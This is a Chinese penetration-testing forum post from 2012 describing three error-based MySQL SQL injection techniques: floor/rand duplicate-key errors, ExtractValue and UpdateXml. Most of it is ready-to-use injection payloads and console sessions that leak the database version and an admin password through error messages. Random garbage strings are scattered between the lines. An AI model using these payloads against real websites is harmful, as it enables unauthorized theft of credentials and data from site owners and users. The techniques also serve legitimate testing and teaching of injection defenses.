中国网络渗透测试联盟
标题:
关于Mysql注入过程中的三种报错方式
[打印本页]
作者:
admin
时间:
2012-12-10 10:28
标题:
关于Mysql注入过程中的三种报错方式
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
: f/ l# `% f9 E/ b
实际测试环境:
, O& q' f1 I, d0 I* M) d
% a+ n; i' V* |6 a
! ]/ p/ I3 M. {+ b/ ~
mysql> show tables;
+ U6 O, }5 a; e
+----------------+
* B" c6 L) Y! y. b
| Tables_in_test |
* r( K% n! D0 s$ K2 V- ^$ Z
+----------------+
% q; Q( f& l5 Q o% i7 e
| admin |
2 j- O Z3 K3 Q% F
| article |
# Y2 L/ N0 x. |2 B2 ? k* g9 y
+----------------+
& u8 E, ~) ?) s" M
' H* c" `7 q G: a6 J+ \1 u9 f2 c
2 `' S) I# ]( z% U7 v9 E0 X' K+ q% P
& {& h% z P4 d( `% p
mysql> describe admin;
& E& d7 r6 D/ t; X
+-------+------------------+------+-----+---------+----------------+
+ C. }6 {/ O# W% o6 d
| Field | Type | Null | Key | Default | Extra |
7 q2 @+ K; Q1 `- r+ {1 [
+-------+------------------+------+-----+---------+----------------+
0 ]# G7 O+ g( k% C
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
0 c. Q7 v2 D; n0 Q0 k
| user | varchar(50) | NO | | NULL | |
a! u5 x( J& B6 R! Y
| pass | varchar(50) | NO | | NULL | |
* c9 l O; i6 `( m5 ~8 K
+-------+------------------+------+-----+---------+----------------+
) U M, m8 M0 M7 ~, }7 k
. f5 [# d* v5 o; X% D& U/ D' J
% u" _' i' k/ d
& b' x4 ?$ ]$ B. q$ j( S
mysql> describe article;
3 Z' w9 y3 ~4 q# U) I
+---------+------------------+------+-----+---------+----------------+
% j: P0 m4 b/ O0 r0 H
| Field | Type | Null | Key | Default | Extra |
) d; u0 T* j% f; u
+---------+------------------+------+-----+---------+----------------+
, Q: ]1 j. x( {2 z
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
- O( d8 @8 v% U; M' I
| title | varchar(50) | NO | | NULL | |
( U1 f& e! f$ b5 u1 H n
| content | varchar(50) | NO | | NULL | |
0 a7 @' _- I+ S. D8 S2 P
+---------+------------------+------+-----+---------+----------------+
1 {4 }2 [& Q) D/ l) `- e
1、通过floor报错
) F% I E; `' G: q
可以通过如下一些利用代码
# |# e: J- t8 G) B2 q" L6 M
' A3 S, z- N% ~( X+ P0 K
9 R0 m- }0 A4 L9 c# ~) A
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
r' Y) W6 \2 E0 }
from information_schema.tables group by x)a);
5 j; C* }; n6 I. j
1 Q1 |! i- t5 o* Z
5 @3 g( j9 b* I) _ P6 M" [. X
and (select count(*) from (select 1 union select null union select !1)x
0 z$ H5 @/ w7 t( e
group by concat((select table_name from information_schema.tables limit 1),
6 o- D: X- N9 b6 s
floor(rand(0)*2)));
6 }# ?+ e+ @, y
举例如下:
( t% R; Z2 h% ~# `! y, C
首先进行正常查询:
% i1 ~/ U* h" K8 ^# H+ W1 {5 K
' ], t5 c& n0 w0 u' ?: K8 M. r2 O
mysql> select * from article where id = 1;
3 i; ^# y; f! g4 v& }7 M8 h5 Q' [ |
+----+-------+---------+
$ i9 E+ x. x) ^/ F/ U2 A
| id | title | content |
4 I1 D- D+ ~ n/ k
+----+-------+---------+
1 i5 s7 }& w5 p* s- ~, A
| 1 | test | do it |
7 [, C N, s( S( l: l
+----+-------+---------+
. Z; @7 ~% D4 k, f' ^, V0 U1 Z
假如id输入存在注入的话,可以通过如下语句进行报错。
! R9 W; b8 Z6 C0 t! l6 E" \
9 Q4 g* C& k# c+ I/ e
7 |+ b7 l, P. g' I' S
mysql> select * from article where id = 1 and (select 1 from
5 a4 w& S5 [* Q r7 m6 F
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
& D9 {5 W0 ]; N* K5 D2 s" z9 {
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
p7 K% {. Z1 `9 Z5 G/ ^
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
6 C5 Z$ H" V5 T+ O. Y0 {$ ^1 v- F
例如我们需要查询管理员用户名和密码:
) P9 D, _/ y6 h9 `2 H: W
Method1:
5 P+ D+ ~4 O7 s8 d* c4 w) ?) k
# L: O/ O5 r, e# \8 `
+ q4 r& w4 c2 l n' q
mysql> select * from article where id = 1 and (select 1 from
2 b& A9 h( d+ ?) W6 G B# W
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
1 M9 d3 q% ?" L1 p4 ]
from information_schema.tables group by x)a);
$ h# h) }4 J, h
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
; R( m$ X5 ~6 B) B- @/ h
Method2:
3 M6 U T& @7 H
# | h5 h, a0 g* Z$ C1 h+ r
2 v; w2 J4 u! t/ _: K+ Y
mysql> select * from article where id = 1 and (select count(*)
. Z6 R& `" {- ]/ R, p, X: Q
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
) G4 B: y1 k: L
floor(rand(0)*2)));
* @2 u. s; ]+ W z; i! l: ~
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
8 R, F; K& v2 a1 h, p* D9 }
2、ExtractValue
& b" _1 y0 {- ]/ o* |
测试语句如下
. l$ `- g5 Z) b) U5 m) b
3 ~& a3 s+ y- @# ~9 {7 r( [6 P
X) }6 ?5 B0 P
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
|6 ?* D( Q# J- T0 B) ?
实际测试过程
/ E. P( M- r/ D* G6 S$ i
- t) C* O- \5 K8 H: N! N
9 E. |1 m f. g. b5 a7 a/ E
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
% W. e( ^* ]$ z
(select pass from admin limit 1)));--
$ \+ ^8 k- q4 E$ s3 d
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
% E6 v/ Q$ I0 K$ j0 d1 [6 j. T
3、UpdateXml
$ W' x) C# Z3 c3 u; [
测试语句
8 O* j& Z; D* k a+ M2 I
+ U7 Z( k% `9 b2 `! x# Z
3 r4 |" T( p" V% j, t
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
9 F6 B1 e( w& a( B' A& P4 o, g8 E8 A
实际测试过程
" S+ \4 `: z' A. ?; }& G
3 H/ j R" \) f) d8 z- P8 n, S
9 @% H& P9 D u! r" C8 J
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
! v h" q w+ h# P/ p$ S8 z
(select pass from admin limit 1),0x5e24),1));
|' n5 a! k# x2 ? j6 j
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
6 L/ E5 p9 T% G9 G
All, thanks foreign guys.
: {5 G4 l6 c* c$ A% `, y
' y% t) g; A1 c- ]- f/ O8 ]; G
1 j. K$ ?+ ?* m# J2 r z! v
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2